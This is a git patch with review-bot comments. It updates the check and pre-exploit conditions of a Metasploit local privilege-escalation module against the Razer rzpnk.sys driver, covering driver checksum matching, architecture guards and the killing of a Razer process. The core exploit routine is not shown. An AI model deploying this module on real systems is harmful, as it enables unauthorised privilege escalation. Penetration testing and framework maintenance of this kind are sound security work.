From b4813ce2c7fb72732377c85c033856886c861e89 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre
Date: Sat, 15 Jul 2017 14:48:54 -0400
Subject: [PATCH] Update the pre-exploit check conditions
---
 .../windows/local/razer_zwopenprocess.rb | 33 +++++++++++--------
 1 file changed, 20 insertions(+), 13 deletions(-)
diff --git a/modules/exploits/windows/local/razer_zwopenprocess.rb b/modules/exploits/windows/local/razer_zwopenprocess.rb
index b7e44c6825e3..2bbf3cb82704 100644
--- a/modules/exploits/windows/local/razer_zwopenprocess.rb
+++ b/modules/exploits/windows/local/razer_zwopenprocess.rb
@@ -70,15 +70,22 @@ def initialize(info = {})
 end
 def check
- pid = session.sys.process['RazerIngameEngine.exe']
- session.sys.process.kill(pid) unless pid.nil?
-
- pid = session.sys.process['winlogon.exe']
- handle = get_handle(pid)
- return Exploit::CheckCode::Safe if handle.nil?
+ # Validate that the driver has been loaded and that
+ # the version is the same as the one expected
+ client.sys.config.getdrivers.each do |d|
+ if d[:basename].downcase == 'rzpnk.sys'
+ expected_checksum = 'b4598c05d5440250633e25933fff42b0'
+ target_checksum = client.fs.file.md5(d[:filename])
+ if expected_checksum == Rex::Text.to_hex(target_checksum, '')
+ return Exploit::CheckCode::Appears
+ else
+ return Exploit::CheckCode::Detected
+ end
+ end
+ end
- session.railgun.kernel32.CloseHandle(handle)
- Exploit::CheckCode::Vulnerable
+ Exploit::CheckCode::Safe
 end
 def exploit
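Review bot: The digest on the `expected_checksum = 'b4598c05d5440250633e25933fff42b0'` line is a magic value with no record of which rzpnk.sys build it was taken from, so a later reader cannot tell whether a Detected result means an older, newer or modified driver; hoist it to a frozen module constant with a provenance comment, e.g. `RZPNK_SYS_MD5 = 'b4598c05d5440250633e25933fff42b0'.freeze # rzpnk.sys <driver version — fill in>, the build this module was verified against`. The `else` branch returning Detected rather than Safe on a mismatch looks deliberate (an untested build may still carry the flaw), but that reasoning should be stated on the line, e.g. `# driver present but not the verified build: Detected, not Safe`. The rewritten check is also side-effect free now (the removed lines killed RazerIngameEngine.exe from inside check), which is the right contract for a check method and is worth a one-line comment so a future edit does not reintroduce it. Finally, this body reaches the target via `client.sys.config`/`client.fs.file` while the exploit method in the following hunk uses `session`; they appear to be aliases here, but using one name throughout keeps the module consistent, and `d[:basename].downcase` will raise rather than fall through to Safe if a driver entry lacks a basename, which I cannot confirm from this hunk.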
@@ -90,14 +97,14 @@ def exploit
 fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
 end
- if sysinfo['Architecture'] =~ /wow64/i
- fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
- elsif sysinfo['Architecture'] == ARCH_X86
- fail_with(Failure::NoTarget, 'Session host is x86, but only x64 targets are supported')
+ if session.platform != 'windows'
+ fail_with(Failure::NoTarget, 'This exploit requires a native Windows meterpreter session')
+ elsif session.arch != ARCH_X64
+ fail_with(Failure::NoTarget, 'This exploit only supports x64 Windows targets')
 end
 pid = session.sys.process['RazerIngameEngine.exe']
- unless pid.nil?
+ if pid
 # if this process is running, the IOCTL won't work but the process runs
 # with user privileges so we can kill it
 print_status("Found RazerIngameEngine.exe pid: #{pid}, killing it...")
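Review bot: The new `session.arch != ARCH_X64` guard no longer distinguishes an x86 session on an x64 host from a genuinely x86 host, so the failure message 'This exploit only supports x64 Windows targets' is misleading in the first case, where the target is supported and only the session type is wrong (the removed `sysinfo['Architecture']` lines show that information is available). Keep the guard but make the message name both values, e.g. `fail_with(Failure::NoTarget, "This exploit only supports x64 Windows targets (session arch: #{session.arch}, host arch: #{sysinfo['Architecture']})")`. The literal `'windows'` compared against `session.platform` should be confirmed against what the Meterpreter session class returns for its platform string in this framework version, since a mismatch would make every session fail with NoTarget before the driver is even examined. The `exploit` method starts before this hunk and continues past its last line.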